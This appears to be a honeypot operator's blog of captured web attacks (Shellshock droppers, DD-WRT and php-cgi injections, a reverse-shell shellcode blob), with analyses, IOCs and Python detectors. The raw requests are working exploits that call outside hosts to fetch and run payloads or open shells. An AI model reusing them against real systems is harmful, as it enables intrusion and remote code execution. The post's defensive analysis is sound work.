Friday, 4 March 2016
This is the end
Good morning,
as you may have already found out, the posts on this blog have been getting fewer and fewer. This is caused by the fact that my two honeypots have had some issues.
The vservers will be going down soon. So no more analytics.
Thanks to Swen for keeping the German one running for so long. I am currently looking for cheap vservers in the world and talking to some people about funding the operation costs, until then....
Thursday, 11 February 2016
159.226.162.196 - Shellshock perl wget via 204.232.209.188
BEGIN OF HTTP DATA:
2016-02-11 19:15:33
Source IP: 159.226.162.196
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'
Host: 109.234.106.8
Connection: Close
END OF DATA
The payload tries six different downloaders in turn (wget, curl, fetch, lwp-download, GET, lynx) so that at least one is likely to exist on the target; the .png extension only disguises the second stage. The HTTP server at 204.232.209.188 returned 404 for that URL at the time of the investigation.
Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.
Disclaimer: This information is provided as-is and there is no guarantee that blocking an IP or domain reported in this overview will not adversely impact your business. Use all information provided at your own risk; the author disclaims all warranty and shall not be liable for any damage or impact caused.
159.226.162[.]196
204.232.209[.]188
Sunday, 7 February 2016
178.57.115.231 - (Russian IPs) possible DD-WRT firmware via 178.57.115.231:8081
BEGIN OF HTTP DATA:
2016-02-06 15:33:59
Source IP: 178.57.115.231
GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh HTTP/1.0
Host:195.169.125.87:8080
END OF DATA
The request itself is the classic DD-WRT httpd command injection: everything after the ";" that follows /cgi-bin/ is handed to a shell, with $IFS standing in for spaces (a literal space would end the request-URI) and backslashes ending the variable name. Decoded, it tampers with the http_username and http_passwd nvram variables and commits them, then fetches ug.sh from 178.57.115.231:8081 into /tmp and runs it with /bin/sh.
The ug.sh script tries to download a binary file.
Just by taking a look at the xxd and strings output of the file, it looks like a DD-WRT firmware file.
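As an added example (my own code, not part of the original post), a small Python decoder for the $IFS/backslash obfuscation in the request above. The sample target string is the one the honeypot captured; the function names are my own and the "ÿ" in the chmod argument is reproduced as logged.

```python
import re
from typing import List

# Constructed sample: the request target captured above, byte for byte
# (the odd "ÿ" in the chmod argument is reproduced as the honeypot logged it).
SAMPLE_TARGET = (
    r"/cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;"
    r"nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;"
    r"wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;"
    r"chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh"
)


def deobfuscate(target: str) -> str:
    """Undo the two tricks in the request: $IFS (or ${IFS}) in place of a
    space, and backslash escaping, which both terminates the variable name
    (so "$IFS\\set" is not read as "$IFSset") and hides "/" from URL filters."""
    s = re.sub(r"\$\{?IFS\}?", " ", target)
    return re.sub(r"\\(.)", r"\1", s)


def injected_commands(target: str) -> List[str]:
    """Return the shell commands the vulnerable httpd would run, in order.
    Everything after the first ';' in the cgi-bin path reaches the shell."""
    _, _, rest = deobfuscate(target).partition(";")
    return [c.strip() for c in rest.split(";") if c.strip()]


def download_urls(commands: List[str]) -> List[str]:
    """Second-stage URLs pulled by wget/curl/fetch in the command list."""
    return [u for c in commands for u in re.findall(r"https?://\S+", c)]


if __name__ == "__main__":
    for n, cmd in enumerate(injected_commands(SAMPLE_TARGET)):
        print(f"{n}: {cmd}")
    print("second stage:", download_urls(injected_commands(SAMPLE_TARGET)))
```

For detection the decoding is not even needed: no legitimate client puts `$IFS` or `${IFS}` into a request-URI, so a rule matching either string in the path is a zero-noise indicator for this family of router exploits.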
178.57.115[.]231
- Whois Data (TeamCymru)
- AS : 60139
- IP : 178.57.115.231
- BGP Prefix : 178.57.112.0/21
- CC : RU
- Registry : ripencc
- Allocated : 2010-02-02
- AS Name: Z-TELECOM Z-Telecom Ltd,RU
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
Sunday, 24 January 2016
61.49.45.47 - WhatWeb/0.4.8-dev (first time seen)
BEGIN OF HTTP DATA:
2016-01-23 16:47:13
Source IP: 61.49.45.47
GET / HTTP/1.1
User-Agent: WhatWeb/0.4.8-dev
Host: 109.234.106.8:8080
Connection: close
Accept: */*
END OF DATA
WhatWeb is an open-source web scanner that fingerprints the software running on a site (web server, CMS, frameworks, JavaScript libraries and their versions) from response headers and page content; seeing its User-Agent means someone is profiling the host, not yet attacking it. For more information: https://user-agents.me/crawler/whatweb048-dev
61.49.45[.]47
- Whois Data (TeamCymru)
- AS : 4808
- IP : 61.49.45.47
- BGP Prefix : 61.49.0.0/18
- CC : CN
- Registry : apnic
- Allocated : 2001-06-28
- AS Name: CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network,CN
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
- Dynamic Source: SANS Internet Storm Center
- comment:IP is listed on SANS ISC
- Reference: https://isc.sans.edu/api/ip/61.49.45.47
Thursday, 21 January 2016
213.136.72.84 - Shellshock perl via 204.232.209.188
BEGIN OF HTTP DATA:
2016-01-20 09:58:59
Source IP: 213.136.72.84
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'
Host: 195.169.125.87
Connection: Close
END OF DATA
213.136.72[.]84
204.232.209[.]188
92.45.197.218 - Zollard php execution
BEGIN OF HTTP DATA:
Sadly the request was too long to be fully logged by the fake HTTP server.
2016-01-21 09:47:25
Source IP: 92.45.197.218
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1817
Connection: close
<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
global $disablefunc;
$result = "";
if (!empty($cmd))
{
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disabl
END OF DATA
Decoded, the POST request line is:
POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n HTTP/1.1
This is the php-cgi query-string argument injection (CVE-2012-1823): because the raw query contains no literal "=", the web server hands the decoded words to php-cgi as command-line options, and the -d directives switch on allow_url_include and set auto_prepend_file=php://input, so the PHP in the POST body (the Zollard dropper cut off above) is executed before any script on the server.
92.45.197[.]218
- Whois Data (TeamCymru)
- AS : 34984
- IP : 92.45.197.218
- BGP Prefix : 92.45.196.0/23
- CC : TR
- Registry : ripencc
- Allocated : 2007-12-17
- AS Name: TELLCOM-AS TELLCOM ILETISIM HIZMETLERI A.S.,TR
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
Wednesday, 13 January 2016
Scanner seen on January 14, 2016
- 185.130.5.207 - muieblackcat
- 37.142.32.222 - masscan/1.0
- 149.78.19.136 - masscan/1.0
- 195.169.125.87 - zgrab/0.x
- 185.130.5.235 - muieblackcat
185.130.5[.]207
37.142.32[.]222
149.78.19[.]136
195.169.125[.]87
185.130.5[.]235
83.54.165.57 - Shellshock wget via http://192.192.78.216:9090
BEGIN OF HTTP DATA:
2016-01-13 08:48:44
Source IP: 83.54.165.57
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh && /bin/sh /tmp/S0.sh 0<&1 2>&1
END OF DATA
The target /cgi-bin/authLogin.cgi together with the /share/HDB_DATA path marks this as the QNAP NAS Shellshock vector. The file served as S0.php is a shell script: it is saved as /tmp/S0.sh and executed with /bin/sh, with stdin and stderr tied to stdout, i.e. to the HTTP connection.
83.54.165[.]57
192.192.78[.]216
Tuesday, 12 January 2016
Scanner seen on January 11,12 2016
- 208.100.26.231 - Nmap Scripting Engine
- 141.212.122.81 - zgrab/0.x
- 141.212.122.145 - zgrab/0.x
208.100.26[.]231
141.212.122[.]81
141.212.122[.]145
Saturday, 9 January 2016
85.73.42.84 - Shellshock wget via http://lliillii.altervista.org/io.php
BEGIN OF HTTP DATA:
2016-01-08 10:07:22
Source IP: 85.73.42.84
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1
85.73.42[.]84
- Whois Data (TeamCymru)
- AS : 6799
- IP : 85.73.42.84
- BGP Prefix : 85.73.0.0/16
- CC : GR
- Registry : ripencc
- Allocated : 2006-05-17
- AS Name: OTENET-GR Ote SA (Hellenic Telecommunications Organisation),GR
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
Scanner seen on January 9, 2016
- 93.174.93.203 - masscan/1.0
- 141.212.122.145 - zgrab/0.x
- 69.30.217.226 - muieblackcat
93.174.93[.]203
141.212.122[.]145
69.30.217[.]226
Thursday, 7 January 2016
84.246.228.80 - pChart2 directory traversal to read cnf/db.php
BEGIN OF HTTP DATA:
2016-01-07 21:11:32
Source IP: 84.246.228.80
GET /etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php HTTP/1.1
User-Agent: HTTP_Request2/2.2.1 (http://pear.php.net/package/http_request2) PHP/5.3.3
Host: 109.234.106.8
Accept-Encoding: gzip, deflate
END OF DATA
A directory traversal through the pChart2 example viewer (Action=View&Script=../../../../cnf/db.php), aimed at reading the application's database configuration; the HTTP_Request2/PHP User-Agent points to a scripted scan rather than a browser.
84.246.228[.]80
- Whois Data (TeamCymru)
- AS : 34274
- IP : 84.246.228.80
- BGP Prefix : 84.246.224.0/21
- CC : FR
- Registry : ripencc
- Allocated : 2004-10-25
- AS Name: ELBMULTIMEDIA ELB MULTIMEDIA,FR
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
Scanner seen on January 8, 2016
- 185.130.5.207 - muieblackcat
- 141.212.122.64 - zgrab/0.x
- 5.28.172.193 - masscan/1.0
185.130.5[.]207
141.212.122[.]64
5.28.172[.]193
Wednesday, 6 January 2016
Scanner seen on January 7, 2016
- 149.78.19.136 - masscan/1.0
- 213.57.67.192 - masscan/1.0
- 94.102.48.195 - masscan/1.0
- 195.169.125.87 - zgrab/0.x
- 85.25.217.27 - muieblackcat
149.78.19[.]136
213.57.67[.]192
94.102.48[.]195
195.169.125[.]87
85.25.217[.]27
Tuesday, 5 January 2016
46.172.71.251, 195.169.125.87 - Shellshock in Cookie header, ping to 212.47.238.143
BEGIN OF HTTP DATA:
2016-01-05 21:01:11
Source IP: 46.172.71.251 (2nd: 195.169.125.87)
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close
END OF DATA
The path /rom-0 is the probe for the ZyNOS configuration-dump bug on ZyXEL-based routers, but here it is only a carrier: the Shellshock payload sits in the Cookie header and makes the victim send a single ping to 212.47.238.143, a blind check that tells the attacker which hosts executed it without dropping anything on disk.
212.47.238[.]143
46.172.71[.]251
195.169.125[.]87
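As an added example (my own code, not from the original posts), a Python detector that serves all the Shellshock captures on this page: the perl droppers of 11 February and 21 January, the QNAP authLogin.cgi requests of 13 and 9 January, and the Cookie-header ping above. It parses a raw request, looks for the bash function-definition prefix in any header, and pulls the second-stage URLs and contact IPs out of the payload as IOCs. The sample requests are copied from the captures; the regexes and function names are my own.

```python
import re
from typing import Dict, List, Optional

# A bash function definition "() { ... }" at the start of an environment
# variable is what a vulnerable bash (CVE-2014-6271) parses on import; the
# text after the closing brace is executed as a command. CGI copies request
# headers into the environment (HTTP_USER_AGENT, HTTP_COOKIE, ...), so any
# header is a delivery channel, not just User-Agent.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;?")
URL_RE = re.compile(r"https?://[^\s\"';]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed samples: request line and headers copied from the captures on
# this page (the honeypot's own timestamp / "Source IP" lines left out).
PERL_DROPPER = r"""GET HTTP/1.1 HTTP/1.1
Accept: */*
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'
Host: 195.169.125.87
Connection: Close
"""
QNAP_DROPPER = r"""GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh && /bin/sh /tmp/S0.sh 0<&1 2>&1
"""
COOKIE_PING = r"""GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close
"""
BENIGN = r"""GET /index.html HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Connection: close
"""


def parse_request(raw: str):
    """Split a raw HTTP request into its request line and a {name: value}
    header map (names lower-cased; a blank line ends the header block)."""
    lines = raw.strip().splitlines()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def find_shellshock(raw: str) -> Optional[Dict]:
    """Return details of a Shellshock attempt found in any header, or None."""
    request_line, headers = parse_request(raw)
    for name, value in headers.items():
        m = SHELLSHOCK_RE.search(value)
        if not m:
            continue
        payload = value[m.end():].strip()       # what bash would execute
        return {
            "request": request_line,
            "header": name,
            "payload": payload,
            "urls": sorted(set(URL_RE.findall(payload))),        # second stage
            "contact_ips": sorted(set(IPV4_RE.findall(payload))),  # incl. bare ping/nc targets
        }
    return None


def scan(captures: List[str]) -> List[Dict]:
    """Run the detector over many captures and keep only the hits."""
    return [hit for hit in map(find_shellshock, captures) if hit]


if __name__ == "__main__":
    for hit in scan([PERL_DROPPER, QNAP_DROPPER, COOKIE_PING, BENIGN]):
        print(hit["header"], "->", hit["urls"] or hit["contact_ips"])
```

Matching on the function-definition prefix rather than on specific commands is what keeps the rule useful: the five captures differ completely after the `};`, and the ping variant carries no URL at all, but every one of them starts with `() {`.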
Monday, 4 January 2016
Scanner seen on January 05, 2016
- 118.98.104[.]21 - Morfeus Fucking Scanner
- 89.248.168[.]139 - masscan/1.0
- 5.28.182[.]161 - masscan/1.0
- 93.174.93[.]203 - masscan/1.0
118.98.104[.]21
89.248.168[.]139
5.28.182[.]161
93.174.93[.]203
118.98.104.21 - Morfeus Fucking Scanner
118.98.104[.]21
- Whois Data (TeamCymru)
- AS : 17974
- IP : 118.98.104.21
- BGP Prefix : 118.98.104.0/24
- CC : ID
- Registry : apnic
- Allocated : 2007-08-24
- AS Name: TELKOMNET-AS2-AP PT Telekomunikasi Indonesia,ID
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
- Dynamic Source: SANS Internet Storm Center
- comment:IP is listed on SANS ISC
- Reference: https://isc.sans.edu/api/ip/118.98.104.21
- Static Source: http://sendmespamids.blogspot.nl/ Blacklist
- Comment: Listed on Honeypot blacklist
- Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt
77.126.12.73 - masscan/1.0
77.126.12[.]73
- Whois Data (TeamCymru)
- AS : 9116
- IP : 77.126.12.73
- BGP Prefix : 77.126.0.0/20
- CC : IL
- Registry : ripencc
- Allocated : 2006-11-07
- AS Name: GOLDENLINES-ASN 012 Smile Communications Ltd.,IL
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
- Dynamic Source: IBM X-Force Exchange
- Score: 5.7
- Reference: https://exchange.xforce.ibmcloud.com/ip/77.126.12.73
- Dynamic Source: SANS Internet Storm Center
- comment:IP is listed on SANS ISC
- Reference: https://isc.sans.edu/api/ip/77.126.12.73
Friday, 1 January 2016
185.130.5.224 - apache 0day by @hxmonsegur [Update1 - 05/01/2016]
BEGIN OF HTTP DATA:
2016-01-01 05:47:15
185.130.5.224
GET /server-status?HTTP_POST=%"%6346#%#/ˠ%"#423|;&HTTP_CGI_GET=GRESYYK"K&J"#L523D2G23H23 HTTP/1.0
User-Agent: apache 0day by @hxmonsegur
Accept: */*
31c031db31c951b10651b10151b1025189e1b301b066cd8089c231c031c951516848e51cb966680539b102665189e7b31053575289e1b303b066cd8031c939c1740631c0b001cd8031c0b03f89d3cd8031c0b03f89d3b101cd8031c0b03f89d3b102cd8031c031d250686e2f7368682f2f626989e3505389e1b00bcd8031c0b001cd80
END OF DATA
185.130.5[.]224
- Whois Data (TeamCymru)
- AS : 203569
- IP : 185.130.5.224
- BGP Prefix : 185.130.5.0/24
- CC : LT
- Registry : ripencc
- Allocated : 2015-12-04
- AS Name: SILK-AS Sindicate Group Ltd,LT
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
- Dynamic Source: IBM X-Force Exchange
- Score: 1.4
- Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.224
- Dynamic Source: SANS Internet Storm Center
- comment:IP is listed on SANS ISC
- Reference: https://isc.sans.edu/api/ip/185.130.5.224
UPDATE:
The vulnerability (if it exists and is not just a marketing idea to push Twitter followers) is not reflected by any entry in exploit-db.com or 0day.today
UPDATE 2: (Thanks to @DanielRufde)
https://www.reddit.com/r/security/comments/3z4yiw/user_agent_apache_0day_by_hxmonsegur_new_hacking/cyjxuu0
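Whatever the "0day" is, the hex blob in the request body is ordinary x86 Linux shellcode, and a few lines of Python are enough to triage it without a disassembler. As an added example (my own code, not from the original post), the script below hex-decodes the blob, counts the int 0x80 syscalls, recovers a sockaddr_in built on the stack (push imm32 address followed by push imm16 port) and reassembles strings pushed a dword at a time. The sample is the blob above with the line-wrap whitespace removed; the heuristic and names are my own.

```python
import socket
import struct
from typing import Dict, List, Tuple

# Constructed sample: the hex blob from the request above with the line-wrap
# whitespace removed.
SAMPLE_HEX = (
    "31c031db31c951b10651b10151b1025189e1b301b066cd8089c231c031c951516848e51cb9"
    "66680539b102665189e7b31053575289e1b303b066cd8031c939c1740631c0b001cd8031c0"
    "b03f89d3cd8031c0b03f89d3b101cd8031c0b03f89d3b102cd8031c031d250686e2f7368"
    "682f2f626989e3505389e1b00bcd8031c0b001cd80"
)


def immediate_pushes(code: bytes) -> List[Tuple[int, bytes]]:
    """Linear scan for 'push imm32' (68 xx xx xx xx) and 'push imm16'
    (66 68 xx xx). This is a triage heuristic, not a disassembler: a 0x68
    inside another instruction's operand would yield a bogus entry, so
    confirm anything interesting with objdump or ndisasm."""
    pushes, i = [], 0
    while i < len(code):
        if code[i] == 0x68 and i + 5 <= len(code):
            pushes.append((i, code[i + 1:i + 5]))
            i += 5
        elif code[i] == 0x66 and i + 4 <= len(code) and code[i + 1] == 0x68:
            pushes.append((i, code[i + 2:i + 4]))
            i += 4
        else:
            i += 1
    return pushes


def triage(hexblob: str) -> Dict:
    """Summarise a hex-encoded x86 shellcode blob: size, syscall count,
    network endpoints and stack-built strings."""
    code = bytes.fromhex("".join(hexblob.split()))
    pushes = immediate_pushes(code)
    # sockaddr_in built on the stack: push imm32 (sin_addr, already in
    # network byte order) immediately followed by push imm16 (sin_port).
    endpoints = [
        (socket.inet_ntoa(addr), struct.unpack(">H", port)[0])
        for (_, addr), (_, port) in zip(pushes, pushes[1:])
        if len(addr) == 4 and len(port) == 2
    ]
    # Strings are pushed a dword at a time; the last push lands at the lowest
    # address, so a run of printable dwords reads back in reverse order.
    strings, run = [], []
    for _, imm in pushes + [(-1, b"")]:
        if len(imm) == 4 and all(0x20 <= c < 0x7F for c in imm):
            run.append(imm)
            continue
        if run:
            strings.append(b"".join(reversed(run)).decode("ascii"))
            run = []
    return {
        "bytes": len(code),
        "int80": code.count(b"\xcd\x80"),   # number of int 0x80 instructions
        "endpoints": endpoints,
        "strings": strings,
    }


if __name__ == "__main__":
    print(triage(SAMPLE_HEX))
```

Run on the blob above it reports a connect-back to 72.229.28.185:1337 followed by an execve of //bin/sh, i.e. a stock 32-bit Linux reverse shell with nothing Apache-specific about it; the request line and the User-Agent are the only parts that mention Apache at all. The endpoint is the IOC worth blocking, whatever the "0day" turns out to be.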